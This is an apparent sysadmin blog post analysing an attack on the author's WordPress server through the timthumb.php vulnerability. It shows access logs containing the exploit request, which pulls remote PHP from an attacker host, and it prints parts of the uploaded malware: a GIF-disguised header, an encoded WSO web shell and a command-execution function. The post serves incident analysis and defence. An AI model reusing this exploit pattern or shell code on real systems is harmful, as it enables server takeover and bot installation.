I already wrote an article this week about the timthumb.php vulnerability which allows hackers to upload and execute files via Wordpress blogs.
Last time the hack took me by surprise, this time I was prepared. I set up a special monitoring for new processes and tonight the trap worked. At 20:06 a fake process was launched by www-data:
# ps auxf | grep www
root 16995 0.0 0.0 87856 716 pts/0 S+ 21:00 0:00 \_ grep www
www-data 7170 0.0 0.9 225316 40088 ? S 14:06 0:00 \_ /usr/sbin/apache2 -k start
www-data 29483 14.5 10.4 1049984 419648 ? Sl 17:37 29:36 \_ /usr/sbin/apache2 -k start
www-data 2594 14.3 9.0 1022848 366568 ? Sl 18:30 21:24 \_ /usr/sbin/apache2 -k start
www-data 6318 11.5 9.0 1088992 364764 ? Sl 19:13 12:19 \_ /usr/sbin/apache2 -k start
www-data 11256 0.0 0.0 0 0 ? Z 20:06 0:00 \_ [sh]
www-data 11260 97.5 0.1 24592 5336 ? R 20:06 52:26 /usr/sbin/httpd
After a quick research on access logs, I've found the following entries:
184.73.160.230 - - [12/Nov/2011:20:06:23 +0100] "GET / HTTP/1.1" 200 31358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Fire
fox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:27 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com.thomaswdufour.com/patcherfinal.php HTTP/
1.1" 400 582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=uname HTTP/1.1" 200
139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=backup HTTP/1.1" 20
0 66 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=check HTTP/1.1" 200
135 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/inc.php HTTP/1.1" 200 126 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:40 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=patch HTTP/1.1" 200
63 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
As soon as I saw the timthumb.php, the hack was immediately known to me. But this time it was a little bit different. In the last post only a command was executed, the uploaded php file was rather small. This time, the uploaded php file from source http://picasa.com.thomaswdufour.com/patcherfinal.php was rather big and even creates new sockets.
The file starts again with a binary code, like this:
GIF89a????????!?????,???????D?;?// Coded [c] 2011 by v0ld3m0rt
// Unknown Indonesian H4xx0r
error_reporting(0);
$uname = php_uname();
$htaccess = "PEZpbGVzIH4gIlwuKHBocHxwaHAzfGNnaXxwaHA0fHBocDUpJCI+DQogIGRlbnkgZnJvbSBhbGwNCjwvRmlsZXM+";
$data = "PD9waHANCi8qIFdTTyAyLjEgKFdlYiBTaGVsbCBieSBvUmIpICovDQppZighZmlsZV9leGlzdH....
But the more interesting part comes at the end:
function ex($in) {
$out = '';
if(function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function CreateFile($path, $content)
{
$handle = fopen($path, "a+");
fwrite($handle, $content);
fclose($handle);
}
You can take a look at the full file here: external_patcherfinal.txt
The php script allows the hacker to execute commands on the server by using the functions passthru, system and shell_exec. But those functions are disabled on my server.
However by using the function popen, a forked command (in this case a bot) could be launched, which was executed just after the upload:
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=infect&bot=[somebinarycode] HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Now it doesn't stop here. As one can see in the access log, another file 'inc.php' was as well accessed. If opened by browser, it looks like this:
The file starts with the following code:
/* WSO 2.1 (Web Shell by oRb) */
if(!file_exists("data.php")) {
WriteData();
Interesting, a php shell was uploaded. Let's take a look at it by modifying the password function:
And by using this web-shell, other files can be uploaded, executed, overwritten, and so on.
Two more files were found in the same directory: data.php and in the cache folder was a file called 'sex'. The 'sex'-file was actually a perl file which was then most probably executed by the shell. And this is the source of the fake Apache process discovered at first.
No comments yet.
AWS Android Ansible Apache Apple Atlassian BSD Backup Bash Bluecoat CMS Chef Cloud Coding Consul Containers CouchDB DB DNS Database Databases Docker ELK Elasticsearch Filebeat FreeBSD Galera Git GlusterFS Grafana Graphics HAProxy HTML Hacks Hardware Icinga Influx Internet Java KVM Kibana Kodi Kubernetes LVM LXC Linux Logstash Mac Macintosh Mail MariaDB Minio MongoDB Monitoring Multimedia MySQL NFS Nagios Network Nginx OSSEC OTRS Office OpenSearch PGSQL PHP Perl Personal PostgreSQL Postgres PowerDNS Proxmox Proxy Python Rancher Rant Redis Roundcube SSL Samba Seafile Security Shell SmartOS Solaris Surveillance Systemd TLS Tomcat Ubuntu Unix VMWare VMware Varnish Virtualization Windows Wireless Wordpress Wyse ZFS Zoneminder